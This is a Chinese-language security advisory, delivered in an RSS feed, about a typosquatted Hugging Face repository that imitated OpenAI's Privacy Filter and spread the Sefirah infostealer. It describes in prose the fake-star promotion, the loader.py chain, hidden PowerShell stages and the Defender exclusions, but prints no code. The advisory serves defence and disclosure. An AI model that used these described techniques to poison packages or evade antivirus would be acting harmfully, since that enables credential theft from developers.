<?xml version="1.0" encoding="UTF-8"?><rss version="2.0" xmlns:content="http://purl.org/rss/1.0/modules/content/">
  <channel>
    <title>深信服千里目安全技术中心</title>
    <link>https://wechat2rss.xlab.app/feed/027c7f3b98d9d0f2db84513f0cb94f02e9a8a3d7.xml</link>
    <description>深信服千里目安全技术中心专注网络安全各技术领域研究及应用，囊括六大技术实验室和一个创新研究院，聚焦国内外漏洞、攻防对抗技术、终端安全、高级威胁、威胁情报等安全技术领域专业研究，最终赋能于产品。&#xA;(wechat feed made by @ttttmr https://wechat2rss.xlab.app)</description>
    <managingEditor> (深信服千里目安全技术中心)</managingEditor>
    <pubDate>Tue, 12 May 2026 19:51:55 +0800</pubDate>
    <lastBuildDate>Tue, 12 May 2026 19:51:55 +0800</lastBuildDate>
    <image>
      <url>https://wx.qlogo.cn/mmhead/Q3auHgzwzM6v9pQZGUGdAZCYnQOfPE18AiblFC2lNBibSQfnmJR5tHRA/0</url>
      <title>深信服千里目安全技术中心</title>
      <link>https://wechat2rss.xlab.app/feed/027c7f3b98d9d0f2db84513f0cb94f02e9a8a3d7.xml</link>
    </image>
    <item>
      <title>【恶意文件通告】关于Hugging Face平台仿冒OpenAI仓库的供应链投毒事件</title>
      <link>https://mp.weixin.qq.com/s?__biz=Mzg2NjgzNjA5NQ==&amp;mid=2247525577&amp;idx=1&amp;sn=5f71c741c56237738ad5c7cf6519a70f</link>
      <description>近期，深信服千里目安全技术中心监测到一起围绕Hugging Face平台的开源AI供应链投毒事件。</description>
      <content:encoded><![CDATA[<p><span>深瞻情报实验室</span> <span>2026-05-12 19:51</span> <span style="display: inline-block;">北京</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=4cdcc28f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FAPc6NwjLsxRK4QJxrQXh0OYem3FKDCf8NlQ407AColXwAzxLdzmn6XLNbCpjlJIibPdsthb3IcyoTGhPic8FcdXnCmWY9d4JAzzf78KSDSD70%2F0%3Fwx_fmt%3Djpeg"/></p>
  
  <div style="box-sizing: border-box;font-style: normal;font-weight: 400;text-align: justify;font-size: 16px;color: rgb(62, 62, 62);" data-pm-slice="0 0 []"><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.16635687732342008" data-s="300,640" data-type="gif" data-w="1076" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041908" src="https://wechat2rss.xlab.app/img-proxy/?k=7af5d9ab&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FAPc6NwjLsxQ2FicTTpURJDveiayY3JWuRyjO08FribGd9JPtjtqLsS1Mu3XLvmMNOqVm3ert49K0du4FGt3IBn94r21kibfvZn9h33QichHOujqE%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 25px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 94%;vertical-align: top;border-style: solid;border-width: 1px;border-color: rgb(13, 74, 182);flex: 0 0 auto;align-self: flex-start;height: auto;box-shadow: rgb(13, 74, 182) 6px 6px 0px;background-color: rgb(255, 255, 255);box-sizing: border-box;"><div style="margin: 18px 0% 0px;box-sizing: border-box;"><div style="font-size: 15px;text-align: justify;line-height: 1.6;letter-spacing: 1px;padding: 0px 23px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">近期，深信服千里目安全技术中心监测到一起围绕Hugging Face平台的开源AI供应链投毒事件。</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">安全研究机构HiddenLayer于2026年5月7日披露，攻击者通过typosquatting技术在Hugging Face仿冒OpenAI官方“Privacy Filter”项目，创建恶意仓库Open-OSS/privacy-filter，借助虚假账户刷star冲上平台趋势榜榜首，在被清除前累计下载量约244,000次，最终向受害者部署基于Rust语言开发的Sefirah窃密木马，是开源AI生态历史上规模最大的恶意分发事件之一。</span></p></div></div></div></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;background-color: rgb(229, 240, 247);flex: 0 0 auto;align-self: flex-start;min-width: 10%;max-width: 100%;height: auto;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><div style="transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);margin: 6px 0%;box-sizing: border-box;"><div style="padding: 0px 17px;color: rgb(13, 74, 182);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">恶意文件概要</span></strong></p></div></div></div></div><div style="margin: 25px 0%;box-sizing: border-box;"><p style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);padding: 0px;box-sizing: border-box;"><table style="border-collapse:collapse;border:none;mso-border-left-alt:0.5000pt solid windowtext;mso-border-top-alt:0.5000pt solid windowtext;mso-border-right-alt:0.5000pt solid windowtext;mso-border-bottom-alt:0.5000pt solid windowtext;mso-border-insideh:0.5000pt solid windowtext;mso-border-insidev:0.5000pt solid windowtext;mso-padding-alt:0.0000pt 5.4000pt 0.0000pt 5.4000pt;"><tbody><tr><td data-colwidth="209" width="209" valign="center" style="border-color:#b2b2b2;"><p style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;margin-right: 0pt;margin-left: 0pt;text-indent: 0pt;text-align: center;"><b><font face="仿宋_GB2312"><span leaf="" style="font-style: normal;font-weight: 400;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;text-indent: 0pt;font-family: 仿宋_GB2312;font-size: 12pt;"><span textstyle="" style="font-weight: bold;">事件名称</span></span></font></b></p></td><td data-colwidth="621" width="621" valign="center" style="border-color:#b2b2b2;"><p style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;margin-right: 0pt;margin-left: 0pt;text-indent: 0pt;text-align: left;"><font face="仿宋_GB2312"><span leaf="" style="font-style: normal;font-weight: 400;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;text-indent: 0pt;text-align: left;font-family: 仿宋_GB2312;font-size: 12pt;">关于</span></font><font face="Times New Roman"><span leaf="" style="font-style: normal;font-weight: 400;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;text-indent: 0pt;text-align: left;font-family: 仿宋_GB2312;font-size: 12pt;">Hugging Face</span></font><font face="仿宋_GB2312"><span leaf="" style="font-style: normal;font-weight: 400;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;text-indent: 0pt;text-align: left;font-family: 仿宋_GB2312;font-size: 12pt;">平台仿冒</span></font><font face="Times New Roman"><span leaf="" style="font-style: normal;font-weight: 400;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;text-indent: 0pt;text-align: left;font-family: 仿宋_GB2312;font-size: 12pt;">OpenAI</span></font><font face="仿宋_GB2312"><span leaf="" style="font-style: normal;font-weight: 400;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;text-indent: 0pt;text-align: left;font-family: 仿宋_GB2312;font-size: 12pt;">仓库的供应链投毒事件</span></font></p></td></tr><tr><td data-colwidth="209" width="209" valign="center" style="border-color:#b2b2b2;"><p style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;margin-right: 0pt;margin-left: 0pt;text-indent: 0pt;text-align: center;"><b><font face="仿宋_GB2312"><span leaf="" style="font-style: normal;font-weight: 400;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;text-indent: 0pt;font-family: 仿宋_GB2312;font-size: 12pt;"><span textstyle="" style="font-weight: bold;">发布时间</span></span></font></b></p></td><td data-colwidth="621" width="621" valign="center" style="border-color:#b2b2b2;"><p style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;margin-right: 0pt;margin-left: 0pt;text-indent: 0pt;text-align: left;"><font face="Times New Roman"><span leaf="" style="font-style: normal;font-weight: 400;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;text-indent: 0pt;text-align: left;font-family: 仿宋_GB2312;font-size: 12pt;">2026</span></font><font face="仿宋_GB2312"><span leaf="" style="font-style: normal;font-weight: 400;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;text-indent: 0pt;text-align: left;font-family: 仿宋_GB2312;font-size: 12pt;">年</span></font><font face="Times New Roman"><span leaf="" style="font-style: normal;font-weight: 400;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;text-indent: 0pt;text-align: left;font-family: 仿宋_GB2312;font-size: 12pt;">5</span></font><font face="仿宋_GB2312"><span leaf="" style="font-style: normal;font-weight: 400;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;text-indent: 0pt;text-align: left;font-family: 仿宋_GB2312;font-size: 12pt;">月</span></font><font face="Times New Roman"><span leaf="" style="font-style: normal;font-weight: 400;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;text-indent: 0pt;text-align: left;font-family: 仿宋_GB2312;font-size: 12pt;">12</span></font><font face="仿宋_GB2312"><span leaf="" style="font-style: normal;font-weight: 400;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;text-indent: 0pt;text-align: left;font-family: 仿宋_GB2312;font-size: 12pt;">日</span></font></p></td></tr><tr><td data-colwidth="209" width="209" valign="center" style="border-color:#b2b2b2;"><p style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;margin-right: 0pt;margin-left: 0pt;text-indent: 0pt;text-align: center;"><b><font face="仿宋_GB2312"><span leaf="" style="font-style: normal;font-weight: 400;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;text-indent: 0pt;font-family: 仿宋_GB2312;font-size: 12pt;"><span textstyle="" style="font-weight: bold;">威胁类型</span></span></font></b></p></td><td data-colwidth="621" width="621" valign="center" style="border-color:#b2b2b2;"><p style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;margin-right: 0pt;margin-left: 0pt;text-indent: 0pt;text-align: left;"><font face="仿宋_GB2312"><span leaf="" style="font-style: normal;font-weight: 400;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;text-indent: 0pt;text-align: left;font-family: 仿宋_GB2312;font-size: 12pt;">供应链投毒、信息窃取木马</span></font></p></td></tr><tr><td data-colwidth="209" width="209" valign="center" style="border-color:#b2b2b2;"><p style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;margin-right: 0pt;margin-left: 0pt;text-indent: 0pt;text-align: center;"><b><font face="仿宋_GB2312"><span leaf="" style="font-style: normal;font-weight: 400;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;text-indent: 0pt;font-family: 仿宋_GB2312;font-size: 12pt;"><span textstyle="" style="font-weight: bold;">简单描述</span></span></font></b></p></td><td data-colwidth="621" width="621" valign="center" style="border-color:#b2b2b2;"><p style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;margin-right: 0pt;margin-left: 0pt;text-indent: 0pt;text-align: left;"><font face="仿宋_GB2312"><span leaf="" style="font-style: normal;font-weight: 400;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;text-indent: 0pt;text-align: left;font-family: 仿宋_GB2312;font-size: 12pt;">攻击者在</span></font><font face="Times New Roman"><span leaf="" style="font-style: normal;font-weight: 400;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;text-indent: 0pt;text-align: left;font-family: 仿宋_GB2312;font-size: 12pt;">Hugging Face</span></font><font face="仿宋_GB2312"><span leaf="" style="font-style: normal;font-weight: 400;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;text-indent: 0pt;text-align: left;font-family: 仿宋_GB2312;font-size: 12pt;">注册仿冒</span></font><font face="Times New Roman"><span leaf="" style="font-style: normal;font-weight: 400;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;text-indent: 0pt;text-align: left;font-family: 仿宋_GB2312;font-size: 12pt;">OpenAI Privacy Filter</span></font><font face="仿宋_GB2312"><span leaf="" style="font-style: normal;font-weight: 400;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;text-indent: 0pt;text-align: left;font-family: 仿宋_GB2312;font-size: 12pt;">的恶意仓库</span></font><font face="Times New Roman"><span leaf="" style="font-style: normal;font-weight: 400;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;text-indent: 0pt;text-align: left;font-family: 仿宋_GB2312;font-size: 12pt;">Open-OSS/privacy-filter</span></font><font face="仿宋_GB2312"><span leaf="" style="font-style: normal;font-weight: 400;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;text-indent: 0pt;text-align: left;font-family: 仿宋_GB2312;font-size: 12pt;">，通过虚假账户刷</span></font><font face="Times New Roman"><span leaf="" style="font-style: normal;font-weight: 400;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;text-indent: 0pt;text-align: left;font-family: 仿宋_GB2312;font-size: 12pt;">star</span></font><font face="仿宋_GB2312"><span leaf="" style="font-style: normal;font-weight: 400;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;text-indent: 0pt;text-align: left;font-family: 仿宋_GB2312;font-size: 12pt;">冲上趋势榜首，借助</span></font><font face="Times New Roman"><span leaf="" style="font-style: normal;font-weight: 400;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;text-indent: 0pt;text-align: left;font-family: 仿宋_GB2312;font-size: 12pt;">loader.py</span></font><font face="仿宋_GB2312"><span leaf="" style="font-style: normal;font-weight: 400;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;text-indent: 0pt;text-align: left;font-family: 仿宋_GB2312;font-size: 12pt;">四阶段感染链投递基于</span></font><font face="Times New Roman"><span leaf="" style="font-style: normal;font-weight: 400;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;text-indent: 0pt;text-align: left;font-family: 仿宋_GB2312;font-size: 12pt;">Rust</span></font><font face="仿宋_GB2312"><span leaf="" style="font-style: normal;font-weight: 400;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;text-indent: 0pt;text-align: left;font-family: 仿宋_GB2312;font-size: 12pt;">的</span></font><font face="Times New Roman"><span leaf="" style="font-style: normal;font-weight: 400;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;text-indent: 0pt;text-align: left;font-family: 仿宋_GB2312;font-size: 12pt;">Sefirah</span></font><font face="仿宋_GB2312"><span leaf="" style="font-style: normal;font-weight: 400;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;text-indent: 0pt;text-align: left;font-family: 仿宋_GB2312;font-size: 12pt;">信息窃取木马，窃取受害者的浏览器凭据、加密货币钱包、</span></font><font face="Times New Roman"><span leaf="" style="font-style: normal;font-weight: 400;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;text-indent: 0pt;text-align: left;font-family: 仿宋_GB2312;font-size: 12pt;">Discord</span></font><font face="仿宋_GB2312"><span leaf="" style="font-style: normal;font-weight: 400;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;text-indent: 0pt;text-align: left;font-family: 仿宋_GB2312;font-size: 12pt;">令牌、</span></font><font face="Times New Roman"><span leaf="" style="font-style: normal;font-weight: 400;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;text-indent: 0pt;text-align: left;font-family: 仿宋_GB2312;font-size: 12pt;">SSH/FTP/VPN</span></font><font face="仿宋_GB2312"><span leaf="" style="font-style: normal;font-weight: 400;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;text-indent: 0pt;text-align: left;font-family: 仿宋_GB2312;font-size: 12pt;">凭证及系统敏感数据。</span></font></p></td></tr><tr><td data-colwidth="209" width="209" valign="center" style="border-color:#b2b2b2;"><p style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;margin-right: 0pt;margin-left: 0pt;text-indent: 0pt;text-align: center;"><b><font face="仿宋_GB2312"><span leaf="" style="font-style: normal;font-weight: 400;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;text-indent: 0pt;font-family: 仿宋_GB2312;font-size: 12pt;"><span textstyle="" style="font-weight: bold;">关键特征</span></span></font></b></p></td><td data-colwidth="621" width="621" valign="center" style="border-color:#b2b2b2;"><p style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;margin-right: 0pt;margin-left: 0pt;text-indent: 0pt;text-align: left;"><font face="Times New Roman"><span leaf="" style="font-style: normal;font-weight: 400;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;text-indent: 0pt;text-align: left;font-family: 仿宋_GB2312;font-size: 12pt;">loader.py</span></font><font face="仿宋_GB2312"><span leaf="" style="font-style: normal;font-weight: 400;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;text-indent: 0pt;text-align: left;font-family: 仿宋_GB2312;font-size: 12pt;">禁用</span></font><font face="Times New Roman"><span leaf="" style="font-style: normal;font-weight: 400;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;text-indent: 0pt;text-align: left;font-family: 仿宋_GB2312;font-size: 12pt;">SSL</span></font><font face="仿宋_GB2312"><span leaf="" style="font-style: normal;font-weight: 400;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;text-indent: 0pt;text-align: left;font-family: 仿宋_GB2312;font-size: 12pt;">并解码远程</span></font><font face="Times New Roman"><span leaf="" style="font-style: normal;font-weight: 400;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;text-indent: 0pt;text-align: left;font-family: 仿宋_GB2312;font-size: 12pt;">payload</span></font><font face="仿宋_GB2312"><span leaf="" style="font-style: normal;font-weight: 400;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;text-indent: 0pt;text-align: left;font-family: 仿宋_GB2312;font-size: 12pt;">；多阶段</span></font><font face="Times New Roman"><span leaf="" style="font-style: normal;font-weight: 400;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;text-indent: 0pt;text-align: left;font-family: 仿宋_GB2312;font-size: 12pt;">PowerShell</span></font><font face="仿宋_GB2312"><span leaf="" style="font-style: normal;font-weight: 400;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;text-indent: 0pt;text-align: left;font-family: 仿宋_GB2312;font-size: 12pt;">隐藏执行；批处理写入</span></font><font face="Times New Roman"><span leaf="" style="font-style: normal;font-weight: 400;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;text-indent: 0pt;text-align: left;font-family: 仿宋_GB2312;font-size: 12pt;">Microsoft Defender</span></font><font face="仿宋_GB2312"><span leaf="" style="font-style: normal;font-weight: 400;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;text-indent: 0pt;text-align: left;font-family: 仿宋_GB2312;font-size: 12pt;">排除项；</span></font><font face="Times New Roman"><span leaf="" style="font-style: normal;font-weight: 400;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;text-indent: 0pt;text-align: left;font-family: 仿宋_GB2312;font-size: 12pt;">C2</span></font><font face="仿宋_GB2312"><span leaf="" style="font-style: normal;font-weight: 400;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;text-indent: 0pt;text-align: left;font-family: 仿宋_GB2312;font-size: 12pt;">域名通过</span></font><font face="Times New Roman"><span leaf="" style="font-style: normal;font-weight: 400;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;text-indent: 0pt;text-align: left;font-family: 仿宋_GB2312;font-size: 12pt;">Cloudflare CDN</span></font><font face="仿宋_GB2312"><span leaf="" style="font-style: normal;font-weight: 400;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;text-indent: 0pt;text-align: left;font-family: 仿宋_GB2312;font-size: 12pt;">中转隐藏真实基础设施。</span></font></p></td></tr></tbody></table></p></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;background-color: rgb(229, 240, 247);flex: 0 0 auto;align-self: flex-start;min-width: 10%;max-width: 100%;height: auto;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><div style="transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);margin: 6px 0%;box-sizing: border-box;"><div style="padding: 0px 17px;color: rgb(13, 74, 182);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">事件详述</span></strong></p></div></div></div></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;margin: 0px 0px 0px -12px;box-sizing: border-box;"><div style="transform: rotateZ(90deg);-webkit-transform: rotateZ(90deg);-moz-transform: rotateZ(90deg);-o-transform: rotateZ(90deg);box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 0px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 28px;vertical-align: top;background-color: rgb(102, 188, 41);flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1503267973856209" data-s="300,640" data-type="gif" data-w="306" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041904" src="https://wechat2rss.xlab.app/img-proxy/?k=2be1f9ae&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FAPc6NwjLsxRm3L7xIqTajcaKiayoAiaLxgzqF5kXq9VYRZ6a8AicIM2Bmm1eEvBsW1DQaK4ShRVIyPBC2zZZCAV4u6sLvOz5YF4Fokd7U2Ygdg%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><b style="box-sizing: border-box;"><span leaf="">攻击背景与起因</span></b></p></div></div></div></div><div style="margin: 25px 0%;box-sizing: border-box;"><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);padding: 0px;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">近期，深信服千里安全技术中心监测到一起 Hugging Face 平台的信任链滥用事件。据 HiddenLayer安全研究团队披露：攻击者在全球最大的开源AI模型托管平台Hugging Face上，创建了名为Open-OSS/privacy-filter的恶意仓库。该仓库利用typosquatting（仿冒拼写/相似命名）技术，冒充OpenAI官方发布的Privacy Filter项</span><span leaf="" style="font-style: normal;font-weight: 400;text-align: justify;font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);word-break: break-all;box-sizing: border-box;">目，逐字复</span><span leaf="">制原始项目的Model Card文档，建立高度可信的视觉欺骗。与此同时，攻击者通过自动化脚本批量生成约667个虚假账户对该仓库进行star操作，将其推上Hugging Face平台趋势榜（Trending）榜首位置。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">本次事件滥用了开源AI社区中以“项目名称、下载量、点赞数”为核心的隐性信任体系，是一次典型的供应链投毒事件。</span></p></div></div><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><div style="box-sizing: border-box;font-style: normal;font-weight: 400;text-align: justify;font-size: 16px;color: rgb(62, 62, 62);" data-pm-slice="0 0 []"><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;margin: 0px 0px 0px -12px;box-sizing: border-box;"><div style="transform: rotateZ(90deg);-webkit-transform: rotateZ(90deg);-moz-transform: rotateZ(90deg);-o-transform: rotateZ(90deg);box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 0px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 28px;vertical-align: top;background-color: rgb(102, 188, 41);flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1503267973856209" data-s="300,640" data-type="gif" data-w="306" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041919" src="https://wechat2rss.xlab.app/img-proxy/?k=a8a6aed9&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FAPc6NwjLsxTcML2EtG5icyagz63icGCrwUjg2EuVNlJYOCAHRIvdf3bq7bQqTjuoIZaLhT4DwP8S3qu4ickel5dxQicgyicS9YUf1SXAup0P9uiaw%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">影响范围与风险分析</span></strong></p></div></div></div></div><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">根据HiddenLayer与BleepingComputer的联合披露，本次事件的核心风险并不在于Hugging Face平台代码本身遭篡改，而在于攻击者能够借助开源AI生态的高度开放性，对全球AI开发者、模型工程师及企业研发团队执行近乎“广播式”的恶意软件分发。</span></p><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span style="box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">受影响范围：</span></span></strong></span><span leaf="">恶意仓库在被下架前累计下载量约244,000次，研究人员指出该数字部分可能被人为放大，但仍有相当数量的真实开发者主机被入侵。</span></p></li></ul><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="font-size: 16px;color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">暴露数据：</span></span></strong><span leaf="">浏览器Cookie、保存密码、加密密钥与会话令牌（Chromium与Gecko系）、Discord令牌与本地数据库、加密货币钱包及种子短语、SSH/FTP/VPN凭据及FileZilla配置、本地敏感文件、完整系统信息与多屏截图。</span></p></li></ul><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="font-size: 16px;color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">级联风险：</span></span></strong><span leaf="">受害者多为AI开发者与算法工程师，其主机内通常托管有OpenAI/Anthropic API Key、GitHub/GitLab访问令牌、云厂商凭据、AI模型权重与训练数据集等高价值资产，单台主机失陷即可引发企业级密钥外泄、模型权重盗取乃至云资源接管。</span></p></li></ul></div></div><div style="box-sizing: border-box;font-style: normal;font-weight: 400;text-align: justify;font-size: 16px;color: rgb(62, 62, 62);" data-pm-slice="0 0 []"><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;margin: 0px 0px 0px -12px;box-sizing: border-box;"><div style="transform: rotateZ(90deg);-webkit-transform: rotateZ(90deg);-moz-transform: rotateZ(90deg);-o-transform: rotateZ(90deg);box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 0px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 28px;vertical-align: top;background-color: rgb(102, 188, 41);flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 